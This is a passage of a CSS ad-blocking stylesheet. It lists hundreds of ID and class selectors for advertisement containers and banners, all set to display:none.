dvert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizontal_ad_top,#horizontalads,#hot-deals-ad,#houseAd,#hp-header-ad,#hp-mpu,#hp-right-ad,#hp-store-ad,#hpV2_300x250Ad,#hpV2_googAds,#hp_ad300x250,#ibt_local_ad728,#icePage_SearchLinks_AdRightDiv,#icePage_SearchLinks_DownloadToolbarAdRightDiv,#icePage_SearchResults_ads0_SponsoredLink,#icePage_SearchResults_ads1_SponsoredLink,#icePage_SearchResults_ads2_SponsoredLink,#icePage_SearchResults_ads3_SponsoredLink,#icePage_SearchResults_ads4_SponsoredLink,#idSponsoredresultend,#idSponsoredresultstart,#iframeRightAd,#iframeTopAd,#imu_ad_module,#in_serp_ad,#inadspace,#indexad,#inline-story-ad,#inlineAd,#inlinead,#inlinegoogleads,#inlist-ad-block,#inner-advert-row,#inner-top-ads,#innerpage-ad,#inside-page-ad,#insider_ad_wrapper,#instoryad,#instoryadtext,#instoryadwrap,#int-ad,#interstitial_ad_wrapper,#iqadtile8,#islandAd,#j_ad,#ji_medShowAdBox,#jmp-ad-buttons,#joead,#joead2,#js_adsense,#ka_adRightSkyscraperWide,#ka_samplead,#kaufDA-widget,#kdz_ad1,#kdz_ad2,#keyadvertcontainer,#landing-adserver,#lapho-top-ad-1,#largead,#lateAd,#layerAds_layerDiv,#layerTLDADSERV,#layer_ad_content,#layer_ad_main,#layerad,#leader-board-ad,#leaderAd,#leaderAdContainer,#leader_ad,#leader_board_ad,#leaderad,#leaderad_section,#leaderboard-ad,#leaderboard-bottom-ad,#leaderboardAd,#leaderboard_ad,#leaderboard_ad_gam,#left-ad-1,#left-ad-2,#left-ad-col,#left-ad-skin,#left-bottom-ad,#left-lower-adverts,#left-lower-adverts-container,#leftAdContainer,#leftAd_rdr,#leftAdvert,#leftSectionAd300-100,#left_ad,#left_adspace,#leftad,#leftads,#leftcolAd,#lg-banner-ad,#ligatus,#linkAds,#linkads,#live-ad,#localAds,#logoAd,#longAdSpace,#long_advertisement,#lowerAdvertisementImg,#lower_ad,#lowerads,#lowerthirdad,#lowertop-adverts,#lowertop-adverts-container,#lpAdPanel,#lrecad,#lsadvert-left_menu_1,#lsadvert-left_menu_2,#lsadvert-top,#mBannerAd,#main-ad,#main-ad160x600,#main-ad160x600-img,#main-ad728x90,#main-advert1,#main-advert2,#main-advert3,#main-bottom-ad,#main-tj-ad,#mainAd,#mainAdUnit,#mainAdvert,#mainAdvertismentP,#mainHeaderAdvertisment,#main_ad,#main_rec_ad,#main_top_ad_container,#marketing-promo,#mastAd,#mastAdvert,#mastad,#mastercardAd,#masthead_ad,#masthead_topad,#medRecAd,#media_ad,#mediaplayer_adburner,#mediumAdvertisement,#medrectad,#menuAds,#menubanner-ad-content,#mi_story_assets_ad,#mid-ad300x250,#mid-table-ad,#midRightTextAds,#mid_ad_div,#mid_ad_title,#mid_mpu,#midadd,#midadspace,#middle-ad,#middle_ad,#middle_body_advertising,#middlead,#middleads,#midrect_ad,#midstrip_ad,#mini-ad,#mochila-column-right-ad-300x250,#mochila-column-right-ad-300x250-1,#module-google_ads,#module_ad,#module_box_ad,#module_sky_scraper,#monsterAd,#moogleAd,#moreads,#most_popular_ad,#motionAd,#mpu-advert,#mpu-cont,#mpu300250,#mpuAd,#mpuDiv,#mpuSlot,#mpuWrapper,#mpuWrapperAd,#mpu_banner,#mpu_firstpost,#mpu_holder,#mpu_text_ad,#mpuad,#mpubox,#mr_banner_topad,#mrecAdContainer,#msAds,#ms_ad,#msad,#multiLinkAdContainer,#multi_ad,#my-ads,#myads_HeaderButton,#n_sponsor_ads,#namecom_ad_hosting_main,#narrow-ad,#narrow_ad_unit,#natadad300x250,#national_microlink_ads,#nationalad,#navi_banner_ad_780,#nba160PromoAd,#nba300Ad,#nbaGI300ad,#nbaHouseAnd600Ad,#nbaLeft600Ad,#nbaMidAds,#nbaVid300Ad,#nbcAd300x250,#new_topad,#newads,#news_advertorial_content,#news_advertorial_top,#ng_rtcol_ad,#noresults_ad_container,#noresultsads,#northad,#northbanner-advert,#northbanner-advert-container,#ns_ad1,#ns_ad2,#ns_ad3,#oanda_ads,#onespot-ads,#online_ad,#ovadsense,#p-googleadsense,#page-header-ad,#page-top-ad,#pageAds,#pageAdsDiv,#pageBannerAd,#page_ad,#page_content_top_ad,#pagelet_adbox,#pagelet_netego_ads,#pagelet_search_ads2,#panelAd,#pb_report_ad,#pcworldAdBottom,#pcworldAdTop,#pinball_ad,#player-below-advert,#player_ad,#player_ads,#pmad-in1,#pod-ad-video-page,#populate_ad_bottom,#populate_ad_left,#popup_domination_lightbox_wrapper,#portlet-advertisement-left,#portlet-advertisement-right,#post-promo-ad,#post5_adbox,#post_ad,#premium_ad,#priceGrabberAd,#prime-ad-space,#print-header-ad,#print_ads,#printads,#product-adsense,#promo-ad,#promoAds,#ps-vertical-ads,#pub468x60,#publicidad,#pushdown_ad,#qm-ad-big-box,#qm-ad-sky,#qm-dvdad,#quigo_ad,#r1SoftAd,#rail_ad1,#rail_ad2,#realEstateAds,#rectAd,#rect_ad,#rectangle-ad,#rectangleAd,#rectangle_ad,#refine-300-ad,#region-node-advert,#region-top-ad,#relocation_ad_container,#rh-ad-container,#rh_tower_ad,#rhapsodyAd,#rhs_ads,#rhsadvert,#right-ad,#right-ad-col,#right-ad-skin,#right-ad-title,#right-ad1,#right-ads-3,#right-advert,#right-bar-ad,#right-box-ad,#right-featured-ad,#right-mpu-1-ad-container,#right-uppder-adverts,#right-uppder-adverts-container,#rightAd,#rightAd300x250,#rightAd300x250Lower,#rightAdBar,#rightAdColumn,#rightAd_rdr,#rightAdsDiv,#rightColAd,#rightColumnMpuAd,#rightColumnSkyAd,#right_ad,#right_ad_wrapper,#right_ads,#right_advert,#right_advertisement,#right_advertising,#right_column_ad_container,#right_column_ads,#right_column_adverts,#right_column_internal_ad_container,#right_column_top_ad_unit,#rightad,#rightadContainer,#rightads,#rightadvertbar-doubleclickads,#rightbar-ad,#rightcolhouseads,#rightcolumn_300x250ad,#rightgoogleads,#rightinfoad,#rightside-ads,#rightside_ad,#righttop-adverts,#righttop-adverts-container,#rm_ad_text { display:none !important; } #ros_ad,#rotatingads,#row2AdContainer,#rprightHeaderAd,#rr_MSads,#rt-ad,#rt-ad-top,#rt-ad468,#rtMod_ad,#rtmod_ad,#sAdsBox,#sb-ad-sq,#sb_ad_links,#sb_advert,#search-google-ads,#search-sponsored-links,#search-sponsored-links-top,#searchAdSenseBox,#searchAdSenseBoxAd,#searchAdSkyscraperBox,#search_ads,#search_result_ad,#sec_adspace,#second-adlayer,#secondBoxAdContainer,#secondrowads,#sect-ad-300x100,#sect-ad-300x250-2,#section-ad-1-728,#section-ad-300-250,#section-ad-4-160,#section-blog-ad,#section-container-ddc_ads,#section_advertisements,#section_advertorial_feature,#servfail-ads,#sew-ad1,#shoppingads,#shortads,#show-ad,#showAd,#showad,#side-ad,#side-ad-container,#side-ads,#sideAd,#sideAd1,#sideAd2,#sideAdSub,#sideAds,#sideBarAd,#side_ad,#side_ad_wrapper,#side_ads_by_google,#side_sky_ad,#sidead,#sideads,#sideadtop-to,#sidebar-125x125-ads,#sidebar-125x125-ads-below-index,#sidebar-ad,#sidebar-ad-boxes,#sidebar-ad-space,#sidebar-ad-wrap,#sidebar-ad3,#sidebar-ads,#sidebar-adv,#sidebar-sponsor-link,#sidebar2ads,#sidebar_ad,#sidebar_ad_widget,#sidebar_ads,#sidebar_ads_180,#sidebar_sponsoredresult_body,#sidebar_txt_ad_links,#sidebarad,#sidebaradpane,#sidebarads,#sidebaradver_advertistxt,#sideline-ad,#single-mpu,#singlead,#site-ad-container,#site-leaderboard-ads,#site_top_ad,#sitead,#sky-ad,#skyAd,#skyAdContainer,#skyScrapperAd,#skyWrapperAds,#sky_ad,#sky_advert,#skyads,#skyadwrap,#skyline_ad,#skyscrapeAd,#skyscraper-ad,#skyscraperAd,#skyscraperAdContainer,#skyscraper_ad,#skyscraper_advert,#skyscraperad,#slide_ad,#sliderAdHolder,#slideshow_ad_300x250,#sm-banner-ad,#small_ad,#small_ad_banners_vertical,#small_ads,#smallerAd,#some-ads,#some-more-ads,#specialAd_one,#specialAd_two,#specialadvertisingreport_container,#specials_ads,#speeds_ads,#speeds_ads_fstitem,#speedtest_mrec_ad,#sphereAd,#spnAds,#sponlink,#sponlinks,#sponsAds,#sponsLinks,#sponseredlinks,#sponsorAd1,#sponsorAd2,#sponsorAdDiv,#sponsorLinks,#sponsorTextLink,#sponsor_banderole,#sponsor_deals,#sponsored,#sponsored-ads,#sponsored-features,#sponsored-links,#sponsored-listings,#sponsored-resources,#sponsored1,#sponsoredBox1,#sponsoredBox2,#sponsoredLinks,#sponsoredLinks_Top,#sponsoredList,#sponsoredResults,#sponsoredResultsWide,#sponsoredSiteMainline,#sponsoredSiteSidebar,#sponsored_ads_v4,#sponsored_container,#sponsored_content,#sponsored_game_row_listing,#sponsored_head,#sponsored_link,#sponsored_link_bottom,#sponsored_links,#sponsored_v12,#sponsoredads,#sponsoredlinks,#sponsoredlinks_cntr,#sponsoredlinkslabel,#sponsoredresults_top,#sponsoredwellcontainerbottom,#sponsoredwellcontainertop,#sponsorlink,#spotlightAds,#spotlightad,#sqAd,#squareAd,#squareAdSpace,#squareAds,#square_ad,#srp_adsense-top,#start_middle_container_advertisment,#sticky-ad,#stickyBottomAd,#story-90-728-area,#story-ad-a,#story-ad-b,#story-leaderboard-ad,#story-sponsoredlinks,#storyAd,#storyAdWrap,#storyad2,#submenu-ads,#subpage-ad-right,#subpage-ad-top,#swads,#synch-ad,#systemad_background,#tabAdvertising,#takeoverad,#tblAd,#tbl_googlead,#tcwAd,#td-GblHdrAds,#template_ad_leaderboard,#tertiary_advertising,#test_adunit_160_article,#text-ad,#text-ads,#text-link-ads,#textAd,#textAds,#text_ad,#text_ads,#text_advert,#textad,#textad3,#textad_block,#the-last-ad-standing,#thefooterad,#themis-ads,#tile-ad,#tmglBannerAd,#tmp2_promo_ad,#toolbarSlideUpAd,#top-ad,#top-ad-container,#top-ad-menu,#top-ads,#top-ads-tabs,#top-advertisement,#top-banner-ad,#top-search-ad-wrapper,#topAd,#topAd728x90,#topAdBanner,#topAdBox,#topAdContainer,#topAdSenseDiv,#topAdcontainer,#topAds,#topAdsContainer,#topAdvBox,#topAdvert,#topAdvert-09,#topBannerAd,#topBannerAdContainer,#topContentAdTeaser,#topNavLeaderboardAdHolder,#topOverallAdArea,#topRightBlockAdSense,#topSponsoredLinks,#top_ad,#top_ad-sense,#top_ad_area,#top_ad_banner,#top_ad_game,#top_ad_unit,#top_ad_wrapper,#top_ad_zone,#top_ads,#top_ads_wrap,#top_advertise,#top_advertising,#top_rectangle_ad,#top_right_ad,#top_wide_ad,#topad,#topad1,#topad2,#topad_left,#topad_right,#topadbar,#topadblock,#topaddwide,#topads,#topadsense,#topadspace,#topadwrap,#topadzone,#topbanner_ad,#topbannerad,#topbar-ad,#topcustomad,#topleaderboardad,#topnav-ad-shell,#topnavad,#toprightAdvert,#toprightad,#topsponsored,#toptextad,#tour300Ad,#tour728Ad,#tourSponsoredLinksContainer,#towerad,#ts-ad_module,#ttp_ad_slot1,#ttp_ad_slot2,#twogamesAd,#txfPageMediaAdvertVideo,#txt_link_ads,#txtads,#undergameAd,#upper-ads,#upperAdvertisementImg,#upperMpu,#upper_small_ad,#upperad,#urban_contentad_1,#urban_contentad_2,#urban_contentad_article,#v_ad,#vap_adsense-top,#vert-ads,#vert_ad,#vert_ad_placeholder,#vertical_ad,#vertical_ads,#videoAd,#videoAdvert,#video_ads_overdiv,#video_advert2,#video_advert3,#video_cnv_ad,#video_overlay_ad,#videoadlogo,#view_ads,#view_ads_advertisements,#viewads,#viewportAds,#viewvid_ad300x250,#wXcds12-ad,#wall_advert,#wallpaper-ad-link,#wallpaperAd_left,#wallpaperAd_right,#walltopad,#weblink_ads_container,#welcomeAdsContainer,#welcome_ad_mrec,#welcome_advertisement,#wf_ContentAd,#wf_FrontSingleAd,#wf_SingleAd,#wf_bottomContentAd,#wgtAd,#whatsnews_top_ad,#whitepaper-ad,#whoisRightAdContainer,#wide_ad_unit_top,#wideskyscraper_160x600_left,#wideskyscraper_160x600_right,#widget_Adverts,#widget_advertisement,#widgetwidget_adserve2,#wrapAdRight,#wrapAdTop,#wrapperAdsTopLeft,#wrapperAdsTopRight,#xColAds,#y-ad-units,#y708-ad-expedia,#y708-ad-lrec,#y708-ad-partners,#y708-ad-ysm,#y708-advertorial-marketplace,#yahoo-ads,#yahoo-sponsors,#yahooSponsored,#yahoo_ads,#yahoo_ads_2010,#yahoo_text_ad,#yahooad-tbl,#yan-sponsored,#yatadsky,#ybf-ads,#yfi_fp_ad_mort,#yfi_fp_ad_nns,#yfi_pf_ad_mort,#ygrp-sponsored-links,#ymap_adbanner,#yn-gmy-ad-lrec,#yreSponsoredLinks,#ysm_ad_iframe,#zoneAdserverMrec,#zoneAdserverSuper,.ADBAR,.ADPod,.AD_ALBUM_ITEMLIST,.AD_MOVIE_ITEM,.AD_MOVIE_ITEMLIST,.AD_MOVIE_ITEMROW,.ADbox,.Ad-300x100,.Ad-Container-976x166,.Ad-Header,.Ad-MPU,.Ad-Wrapper-300x100,.Ad120x600,.Ad160x600,.Ad160x600left,.Ad160x600right,.Ad247x90,.Ad300x,.Ad300x250,.Ad300x250L,.Ad728x90,.AdBorder,.AdBox,.AdBox7,.AdContainerBox308,.AdContainerModule,.AdHeader,.AdHere,.AdInfo,.AdInline,.AdMedium,.AdPlaceHolder,.AdProS728x90Container,.AdProduct,.AdRingtone,.AdSense,.AdSenseLeft,.AdSlot,.AdSpace,.AdTextSmallFont,.AdTitle,.AdUnit,.AdUnit300,.Ad_C,.Ad_D_Wrapper,.Ad_E_Wrapper,.Ad_Right,.AdsBottom,.AdsBoxBottom,.AdsBoxSection,.AdsBoxTop,.AdsLinks1,.AdsLinks2,.AdsRec,.AdvBoxSidebar,.Advert,.Advert300x250,.AdvertMidPage,.AdvertiseWithUs,.Advertisement,.AdvertisementTextTag,.Advman_Widget,.ArticleAd,.ArticleInlineAd,.BCA_Advertisement,.Banner300x250,.BannerAd,.BigBoxAd,.BlockAd,.BlueTxtAdvert,.BottomAdContainer,.BottomAffiliate,.BoxAd,.CG_adkit_leaderboard,.CG_details_ad_dropzone,.CWReviewsProdInfoAd,.ComAread,.CommentAd,.ContentAd,.ContentAds,.DAWRadvertisement,.DeptAd,.DisplayAd,.FT_Ad,.FeaturedAdIndexAd,.FlatAds,.FooterAds,.GOOGLE_AD,.GoogleAd,.GoogleAdSenseBottomModule,.GoogleAdSenseRightModule,.HPG_Ad_B,.HPNewAdsBannerDiv,.HPRoundedAd,.HeaderAds,.HomeContentAd,.IABAdSpace,.InArticleAd,.IndexRightAd,.LazyLoadAd,.LeftAd,.LeftButtonAdSlot,.LeftTowerAd,.M2Advertisement,.MD_adZone,.MOS-ad-hack,.MPUHolder,.MPUTitleWrapperClass,.MREC_ads,.MiddleAd,.MiddleAdContainer,.MiddleAdvert,.NewsAds,.OpaqueAdBanner,.OpenXad,.PU_DoubleClickAdsContent,.Post5ad,.Post8ad,.Post9ad,.RBboxAd,.RW_ad300,.RectangleAd,.RelatedAds,.Right300x250AD,.RightAd1,.RightAdvertiseArea,.RightAdvertisement,.RightGoogleAFC,.RightRailAd,.RightRailTop300x250Ad,.RightSponsoredAdTitle,.RightTowerAd,.STR_AdBlock,.SectionSponsor,.SideAdCol,.SidebarAd,.SidebarAdvert,.SitesGoogleAdsModule,.SkyAdContainer,.SponsoredAdTitle,.SponsoredContent,.SponsoredLinkItemTD,.SponsoredLinks,.SponsoredLinksGrayBox,.SponsoredLinksModule,.SponsoredLinksPadding,.SponsoredLinksPanel,.Sponsored_link,.SquareAd,.StandardAdLeft,.StandardAdRight,.TRU-onsite-ads-leaderboard,.TextAd,.TheEagleGoogleAdSense300x250,.TopAd,.TopAdContainer,.TopAdL,.TopAdR,.TopBannerAd,.UIWashFrame_SidebarAds,.UnderAd,.VerticalAd,.Video-Ad,.VideoAd,.WidgetAdvertiser,.a160x600,.a728x90,.ad-120x60,.ad-120x600,.ad-160,.ad-160x600,.ad-160x600x1,.ad-160x600x2,.ad-160x600x3,.ad-250,.ad-300,.ad-300-block,.ad-300-blog,.ad-300x100,.ad-300x250,.ad-300x250-first,.ad-300x250-right0,.ad-300x600,.ad-350,.ad-355x75,.ad-600,.ad-635x40,.ad-728,.ad-728x90,.ad-728x90-1,.ad-728x90-top0,.ad-728x90_forum,.ad-90x600,.ad-above-header,.ad-adlink-bottom,.ad-adlink-side,.ad-area,.ad-background,.ad-banner,.ad-banner-smaller,.ad-bigsize,.ad-block,.ad-block-square,.ad-blog2biz,.ad-body,.ad-bottom,.ad-box,.ad-break,.ad-btn,.ad-btn-heading,.ad-button,.ad-cell,.ad-column,.ad-container,.ad-container-300x250,.ad-container-728x90,.ad-container-994x282,.ad-context,.ad-disclaimer,.ad-display,.ad-div,.ad-enabled,.ad-feedback,.ad-filler,.ad-flex,.ad-footer,.ad-footer-leaderboard,.ad-forum,.ad-google,.ad-graphic-large,.ad-gray,.ad-grey,.ad-hdr,.ad-head,.ad-header,.ad-heading,.ad-holder,.ad-homeleaderboard,.ad-img,.ad-in-post,.ad-index-main,.ad-inline,.ad-island,.ad-item,.ad-label,.ad-leaderboard,.ad-left,.ad-link,.ad-links,.ad-lrec,.ad-medium,.ad-medium-two,.ad-mpl,.ad-mpu,.ad-msn,.ad-note,.ad-notice,.ad-other,.ad-permalink,.ad-place-active,.ad-placeholder,.ad-postText,.ad-poster,.ad-priority,.ad-rect,.ad-rectangle,.ad-rectangle-text,.ad-related,.ad-rh,.ad-ri,.ad-right,.ad-right-header,.ad-right-txt,.ad-row,.ad-section,.ad-show-label,.ad-side,.ad-sidebar,.ad-sidebar-outer,.ad-sidebar300,.ad-sky,.ad-skyscr,.ad-skyscraper,.ad-slot,.ad-slot-234-60,.ad-slot-300-250,.ad-slot-728-90,.ad-source,.ad-space,.ad-space-mpu-box,.ad-space-topbanner,.ad-spot,.ad-square,.ad-square300,.ad-squares,.ad-statement,.ad-story-inject,.ad-tabs,.ad-text,.ad-text-links,.ad-tile,.ad-title,.ad-top,.ad-top-left,.ad-unit,.ad-unit-300,.ad-unit-300-wrapper,.ad-unit-anchor,.ad-unit-top,.ad-vert,.ad-vertical-container,.ad-vtu,.ad-widget-list,.ad-with-us,.ad-wrap,.ad-wrapper,.ad-zone,.ad-zone-s-q-l,.ad.super,.ad08sky,.ad100,.ad120,.ad120x240backgroundGray,.ad120x600,.ad125,.ad140,.ad160,.ad160600,.ad160x600,.ad160x600GrayBorder,.ad200x60,.ad230,.ad250,.ad250c,.ad300,.ad300250,.ad300_250,.ad300x100,.ad300x250,.ad300x250-hp-features,.ad300x250Module,.ad300x250Top,.ad300x250_container,.ad300x250box,.ad300x50-right,.ad300x600,.ad310,.ad315,.ad336x280,.ad343x290,.ad400right,.ad450,.ad468,.ad468_60,.ad468x60,.ad540x90,.ad600,.ad620x70,.ad626X35,.ad644,.ad728,.ad728_90,.ad728x90,.ad728x90_container,.ad90x780,.adAgate,.adArea674x60,.adBanner,.adBanner300x250,.adBanner728x90,.adBannerTyp1,.adBannerTypSortableList,.adBannerTypW300,.adBar,.adBgBottom,.adBgMId,.adBgTop,.adBlock,.adBottomLink,.adBottomboxright,.adBox,.adBox1,.adBox230X96,.adBox728X90,.adBoxBody,.adBoxBorder,.adBoxContainer,.adBoxContent,.adBoxInBignews,.adBoxSidebar,.adBoxSingle,.adBwrap,.adCMRight,.adCell,.adColumn,.adCont,.adContTop,.adContainer,.adContentAd,.adContour,.adCreative,.adCube,.adDiv,.adElement,.adFender3,.adFrame,.adFtr,.adFullWidthMiddle,.adGoogle,.adHeader,.adHeadline,.adHolder,.adHome300x250,.adHorisontal,.adInNews,.adIsland,.adLabel,.adLeader,.adLeaderForum,.adLeaderboard,.adLeft,.adLoaded,.adLocal,.adMPU,.adMarker,.adMastheadLeft,.adMastheadRight,.adMegaBoard,.adMinisLR,.adMkt2Colw,.adModule,.adModuleAd,.adMpu,.adNewsChannel,.adNoOutline,.adNotice,.adNoticeOut,.adObj,.adPageBorderL,.adPageBorderR,.adPanel,.adPod,.adRect,.adResult,.adRight,.adSKY,.adSelfServiceAdvertiseLink,.adServer,.adSky,.adSky600,.adSkyscaper,.adSkyscraperHolder,.adSlot,.adSpBelow,.adSpace,.adSpacer,.adSplash,.adSponsor,.adSpot,.adSpot-brought,.adSpot-searchAd,.adSpot-textBox,.adSpot-twin,.adSpotIsland,.adSquare,.adSubColPod,.adSummary,.adSuperboard,.adSupertower,.adTD,.adTab,.adTag,.adText,.adTileWrap,.adTiler,.adTitle,.adTopLink,.adTopboxright,.adTout,.adTxt,.adUnit,.adUnitHorz,.adUnitVert,.adUnitVert_noImage,.adWebBoard,.adWidget,.adWithTab,.adWord,.adWrap,.adWrapper,.ad_0,.ad_1,.ad_120x90,.ad_125,.ad_130x90,.ad_160,.ad_160x600,.ad_2,.ad_200,.ad_200x200,.ad_250x250,.ad_250x250_w,.ad_3,.ad_300,.ad_300_250,.ad_300x250,.ad_300x250_box_right,.ad_336,.ad_336x280,.ad_350x100,.ad_350x250,.ad_400x200,.ad_468,.ad_468x60,.ad_600,.ad_680x15,.ad_728,.ad_728_90b,.ad_728x90,.ad_925x90,.ad_Left,.ad_Right,.ad_ad_300,.ad_amazon,.ad_banner,.ad_banner_border,.ad_bar,.ad_bg,.ad_bigbox,.ad_biz,.ad_block,.ad_block_338,.ad_body,.ad_border,.ad_botbanner,.ad_bottom,.ad_bottom_leaderboard,.ad_bottom_left,.ad_box,.ad_box2,.ad_box_ad,.ad_box_div,.ad_callout,.ad_caption,.ad_column,.ad_column_box,.ad_column_hl,.ad_contain,.ad_container,.ad_content,.ad_content_wide,.ad_contents,.ad_descriptor,.ad_disclaimer,.ad_eyebrow,.ad_footer,.ad_frame,.ad_framed,.ad_front_promo,.ad_gutter_top,.ad_head,.ad_header,.ad_heading,.ad_headline,.ad_holder,.ad_hpm,.ad_image,.ad_info_block,.ad_inline,.ad_island,.ad_jnaught,.ad_label,.ad_launchpad,.ad_leader,.ad_leaderboard,.ad_left,.ad_line,.ad_link,.ad_links,.ad_linkunit,.ad_loc,.ad_lrec,.ad_main,.ad_medrec,.ad_medrect,.ad_middle,.ad_mod,.ad_mp,.ad_mpu,.ad_mr,.ad_mrec,.ad_mrec_title_article,.ad_mrect,.ad_news,.ad_note,.ad_notice,.ad_one,.ad_p360,.ad_partner,.ad_partners,.ad_plus,.ad_post,.ad_power,.ad_primary,.ad_promo,.ad_rec,.ad_rectangle,.ad_right,.ad_right_col,.ad_row,.ad_row_bottom_item,.ad_side,.ad_sidebar,.ad_skyscraper,.ad_slug,.ad_slug_table,.ad_space,.ad_space_300_250,.ad_spacer,.ad_sponsor { display:none !important; } .ad_sponsoredsection,.ad_spot_b,.ad_spot_c,.ad_square_r,.ad_square_top,.ad_sub,.ad_tag_middle,.ad_text,.ad_text_w,.ad_title,.ad_top,.ad_top_leaderboard,.ad_top_left,.ad_topright,.ad_tower,.ad_unit,.ad_unit_rail,.ad_url,.ad_warning,.ad_wid300,.ad_wide,.ad_wrap,.ad_wrapper,.ad_wrapper_fixed,.ad_wrapper_top,.ad_wrp,.ad_zone,.adarea,.adarea-long,.adbanner,.adbannerbox,.adbannerright,.adbar,.adboard,.adborder,.adbot,.adbottom,.adbottomright,.adbox-outer,.adbox-wrapper,.adbox_300x600,.adbox_366x280,.adbox_468X60,.adbox_bottom,.adbox_br,.adbox_left,.adboxclass,.adboxesrow,.adbreak,.adbug,.adbutton,.adbuttons,.adcode,.adcol1,.adcol2,.adcolumn,.adcolumn_wrapper,.adcont,.adcopy,.add_300x250,.addiv,.adenquire,.adfieldbg,.adfoot,.adfootbox,.adframe,.adhead,.adhead_h,.adhead_h_wide,.adheader,.adheader100,.adheader416,.adhi,.adhint,.adholder,.adhoriz,.adiframe,.adinfo,.adinside,.adintro,.adits,.adjlink,.adkicker,.adkit,.adkit-advert,.adkit-lb-footer,.adlabel-horz,.adlabel-vert,.adlabelleft,.adlayer,.adleader,.adleaderboard,.adleft1,.adline,.adlink,.adlinks,.adlist,.adlnklst,.admarker,.admediumred,.admedrec,.admessage,.admodule,.admpu,.admpu-small,.adnation-banner,.adnotice,.adops,.adp-AdPrefix,.adpadding,.adpane,.adpic,.adprice,.adproxy,.adrec,.adright,.adroot,.adrotate_widget,.adrow,.adrow-post,.adrow1box1,.adrow1box3,.adrow1box4,.adrule,.ads-125,.ads-300,.ads-300x250,.ads-728x90-wrap,.ads-ads-top,.ads-banner,.ads-below-content,.ads-categories-bsa,.ads-custom,.ads-favicon,.ads-item,.ads-links-general,.ads-mpu,.ads-outer,.ads-profile,.ads-right,.ads-section,.ads-sidebar,.ads-sky,.ads-small,.ads-sponsors,.ads-stripe,.ads-text,.ads-top,.ads-wide,.ads-widget,.ads-widget-partner-gallery,.ads03,.ads160,.ads1_250,.ads24Block,.ads300,.ads460,.ads460_home,.ads468,.ads728,.ads728x90,.adsArea,.adsBelowHeadingNormal,.adsBlock,.adsBottom,.adsBox,.adsCell,.adsCont,.adsDiv,.adsFull,.adsImages,.adsInsideResults_v3,.adsMPU,.adsMiddle,.adsRight,.adsRow,.adsTextHouse,.adsTop,.adsTower2,.adsTowerWrap,.adsWithUs,.ads_125_square,.ads_180,.ads_300,.ads_300x100,.ads_300x250,.ads_320,.ads_337x280,.ads_728x90,.ads_big,.ads_big-half,.ads_box,.ads_box_headline,.ads_brace,.ads_catDiv,.ads_container,.ads_disc_anchor,.ads_disc_leader,.ads_disc_lwr_square,.ads_disc_skyscraper,.ads_disc_square,.ads_div,.ads_footer,.ads_header,.ads_holder,.ads_horizontal,.ads_leaderboard,.ads_lr_wrapper,.ads_medrect,.ads_mpu,.ads_outer,.ads_post_end,.ads_post_end_code,.ads_post_start,.ads_post_start_code,.ads_rectangle,.ads_remove,.ads_right,.ads_rightbar_top,.ads_sc_bl_i,.ads_sc_tb,.ads_sc_tl_i,.ads_show_if,.ads_side,.ads_sidebar,.ads_singlepost,.ads_spacer,.ads_takeover,.ads_title,.ads_top,.ads_top_promo,.ads_tr,.ads_verticalSpace,.ads_vtlLink,.ads_widesky,.ads_wrapperads_top,.adsafp,.adsbg300,.adsblockvert,.adsborder,.adsbottom,.adsbox,.adsboxitem,.adsbttmpg,.adsbyyahoo,.adscaleAdvert,.adscaleP6_canvas,.adsclick,.adscontainer,.adscreen,.adsd_shift100,.adsection_a2,.adsection_c2,.adsense-468,.adsense-ad,.adsense-category,.adsense-category-bottom,.adsense-googleAds,.adsense-heading,.adsense-overlay,.adsense-post,.adsense-right,.adsense-title,.adsense3,.adsense300,.adsenseAds,.adsenseBlock,.adsenseContainer,.adsenseGreenBox,.adsenseInPost,.adsenseList,.adsense_bdc_v2,.adsense_mpu